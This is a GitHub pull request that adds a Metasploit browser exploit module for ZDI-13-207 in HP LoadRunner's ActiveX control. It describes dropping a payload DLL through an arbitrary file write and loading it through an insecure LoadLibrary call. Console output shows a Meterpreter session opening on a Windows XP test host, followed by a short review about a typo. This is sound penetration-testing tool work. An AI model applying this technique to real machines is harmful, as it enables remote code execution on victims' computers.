Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add module for ZDI-13-207 #2305

Merged
merged 2 commits into from Aug 30, 2013
Merged

Add module for ZDI-13-207 #2305

merged 2 commits into from Aug 30, 2013

Conversation

jvazquez-r7
Copy link
Contributor

Tested with HP LoadRunner 11.50 on IE8 with Windows XP.

The vulnerability is an abusing of the WriteFileString API to write arbitrary files.

The module uses the vulnerability to drop a payload embedded on a dll and abuses another ActiveX control API which loads an app library (LoadLibrary) in a insecure fashion. The good thing about this method is which allows to exploit Windows XP even when no admin user visits the page (limitation of the WBem technique). The bad thing is which doesn't work on Windows Vista/ Windows 7 because IE runs on a Low Privileged Process and files are written to a virtualized directory, which isn't used by LoadLibrary anymore. Still is a an interesting module to have into the framework I think.

[*] 10.6.0.165       hp_loadrunner_writefilestring - Requesting: /AJGKasLzH5WQ
[*] 10.6.0.165       hp_loadrunner_writefilestring - Sending HTML...
[*] Sending stage (751104 bytes) to 10.6.0.165
[*] Meterpreter session 1 opened (10.6.0.165:4444 -> 10.6.0.165:50673) at 2013-08-29 14:08:29 -0500
[*] New session... remember to delete LrWeb2MdrvLoader.dll

msf exploit(hp_loadrunner_writefilestring) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : JUAN-C0DE875735
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > getuid
Server username: JUAN-C0DE875735\unprivileged
meterpreter > help

zeroSteiner
zeroSteiner reviewed Aug 29, 2013
View reviewed changes
modules/exploits/windows/browser/hp_loadrunner_writefilestring.rb
embedded in a dll, which is later loaded through the Init() method from the
lrMdrvService control, by abusing an insecure LoadLibrary call. This module has
been tested successfully on IE8 on Windows XP. Virtualization based on the Low
Integrity Process, on Windows Vista and 7, will stop this stop this module because
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

"will stop this stop this module" seems like a minor typo

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

agree, thanks @zeroSteiner , fixing!

wchen-r7 added a commit that referenced this pull request Aug 30, 2013
@wchen-r7
Land #2305 - HP LoadRunner lrFileIOService ActiveX WriteFileString Bug
7401f83
@wchen-r7 wchen-r7 merged commit 657be3a into rapid7:master Aug 30, 2013
@jvazquez-r7 jvazquez-r7 deleted the zdi_13_207 branch November 18, 2014 15:59
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
3 participants
@jvazquez-r7 @zeroSteiner @wchen-r7